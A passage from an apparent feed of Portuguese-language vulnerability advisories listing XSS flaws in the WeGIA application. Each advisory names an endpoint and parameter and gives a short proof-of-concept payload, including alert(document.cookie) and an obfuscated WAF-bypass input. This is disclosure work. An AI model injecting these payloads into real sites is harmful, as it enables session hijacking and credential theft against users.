conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7872.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7872.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53929/ https://www.cvehunters.com/pt/p/cve-2025-53929/ <h2 id="cve-2025-53934-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_corphp-parâmetro-cor">CVE-2025-53934: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_cor.php</code> parâmetro <code>cor</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53934" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53934</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_cor.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cor</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada <code>cadastro_pet.php</code> é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /dao/pet/adicionar_cor.php</code></p><h2 id="cve-2025-53934-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_corphp-parâmetro-cor">CVE-2025-53934: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_cor.php</code> parâmetro <code>cor</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53934" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53934</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_cor.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cor</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada <code>cadastro_pet.php</code> é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /dao/pet/adicionar_cor.php</code></p> <p>Parâmetro: <code>cor</code></p> <p>Gatilho XSS: <code>/html/pet/cadastro_pet.php</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>cor</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53929/image.png" width="809" height="498" srcset="/p/cve-2025-53929/image_hu_53ddbaf9c4cb2957.png 480w, /p/cve-2025-53929/image_hu_37121886be6a1b9a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="162" data-flex-basis="389px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrwj-rf3q-3rqj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrwj-rf3q-3rqj</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="colaboradores">Colaboradores </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53930/ https://www.cvehunters.com/pt/p/cve-2025-53930/ <h2 id="cve-2025-53930-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_especiephp-parâmetro-especie">CVE-2025-53930: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_especie.php</code> parâmetro <code>especie</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53930" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53930</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_especie.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>especie</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /dao/pet/adicionar_especie.php</code></p><h2 id="cve-2025-53930-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_especiephp-parâmetro-especie">CVE-2025-53930: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_especie.php</code> parâmetro <code>especie</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53930" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53930</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_especie.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>especie</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /dao/pet/adicionar_especie.php</code></p> <p>Parâmetro: <code>especie</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>especie</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53930/image.png" width="1325" height="311" srcset="/p/cve-2025-53930/image_hu_e1e18487d5585a94.png 480w, /p/cve-2025-53930/image_hu_fad609f1d6c9aa79.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="426" data-flex-basis="1022px" /></p> <p><img src="/p/cve-2025-53930/image-1.png" width="1268" height="246" srcset="/p/cve-2025-53930/image-1_hu_a9011363d8bed49b.png 480w, /p/cve-2025-53930/image-1_hu_4cccc1269b2a5680.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="515" data-flex-basis="1237px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-cxx4-6x69-vg4x" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-cxx4-6x69-vg4x</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="colaboradores">Colaboradores </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53931/ https://www.cvehunters.com/pt/p/cve-2025-53931/ <h2 id="cve-2025-53931-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_racaphp-parâmetro-raca">CVE-2025-53931: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_raca.php</code> parâmetro <code>raca</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53931" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53931</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_raca.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>raca</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /dao/pet/adicionar_raca.php</code></p><h2 id="cve-2025-53931-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_racaphp-parâmetro-raca">CVE-2025-53931: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_raca.php</code> parâmetro <code>raca</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53931" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53931</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_raca.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>raca</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /dao/pet/adicionar_raca.php</code></p> <p>Parâmetro: <code>raca</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>raca</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53931/image.png" width="1321" height="325" srcset="/p/cve-2025-53931/image_hu_2ea3161f08493fe2.png 480w, /p/cve-2025-53931/image_hu_abc31e9ddb1e0d31.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="406" data-flex-basis="975px" /></p> <p><img src="/p/cve-2025-53931/image-1.png" width="1268" height="246" srcset="/p/cve-2025-53931/image-1_hu_a9011363d8bed49b.png 480w, /p/cve-2025-53931/image-1_hu_4cccc1269b2a5680.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="515" data-flex-basis="1237px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9mfp-wfmj-cg3j" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9mfp-wfmj-cg3j</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="colaboradores">Colaboradores </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53932/ https://www.cvehunters.com/pt/p/cve-2025-53932/ <h2 id="cve-2025-53932-cross-site-scripting-xss-refletido-no-endpoint-cadastro_adotantephp-parâmetro-cpf">CVE-2025-53932: Cross-Site Scripting (XSS) Refletido no endpoint <code>cadastro_adotante.php</code> parâmetro <code>cpf</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53932" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53932</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>cadastro_adotante.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cpf</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET /html/pet/adotantes/cadastro_adotante.php</code></p> <p>Parâmetro: <code>cpf</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>cpf</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-53932-cross-site-scripting-xss-refletido-no-endpoint-cadastro_adotantephp-parâmetro-cpf">CVE-2025-53932: Cross-Site Scripting (XSS) Refletido no endpoint <code>cadastro_adotante.php</code> parâmetro <code>cpf</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53932" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53932</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>cadastro_adotante.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cpf</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET /html/pet/adotantes/cadastro_adotante.php</code></p> <p>Parâmetro: <code>cpf</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>cpf</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="s2">"><iNput///type="</span><span class="nx">password</span><span class="s2">"////id="</span><span class="nx">CF</span><span class="o">-</span><span class="nx">bypaSS</span><span class="s2">"%20name="</span><span class="nx">query</span><span class="s2">"////value=""///oNfocUs="</span><span class="nx">alert</span><span class="p">(</span><span class="o">%</span><span class="mi">27</span><span class="nx">chux</span><span class="o">%</span><span class="mi">27</span><span class="p">)</span><span class="s2">"%20AutOfoCus="</span><span class="err">"</span><span class="o">%</span><span class="mi">20</span><span class="o">/></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53932/image.png" width="1359" height="314" srcset="/p/cve-2025-53932/image_hu_f54c74625795f79f.png 480w, /p/cve-2025-53932/image_hu_1a0f9a99ae4c4208.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="432" data-flex-basis="1038px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3vfw-749q-qp6r" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3vfw-749q-qp6r</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="colaboradores">Colaboradores </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53933/ https://www.cvehunters.com/pt/p/cve-2025-53933/ <h2 id="cve-2025-53933-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_enfermidadephp-parâmetro-nome">CVE-2025-53933: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_enfermidade.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53933" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53933</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_enfermidade.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /html/saude/adicionar_enfermidade.php</code></p><h2 id="cve-2025-53933-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_enfermidadephp-parâmetro-nome">CVE-2025-53933: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_enfermidade.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53933" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53933</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_enfermidade.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /html/saude/adicionar_enfermidade.php</code></p> <p>Parâmetro: <code>nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/image.png" loading="lazy" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6558-m8rp-5qg6" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6558-m8rp-5qg6</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" 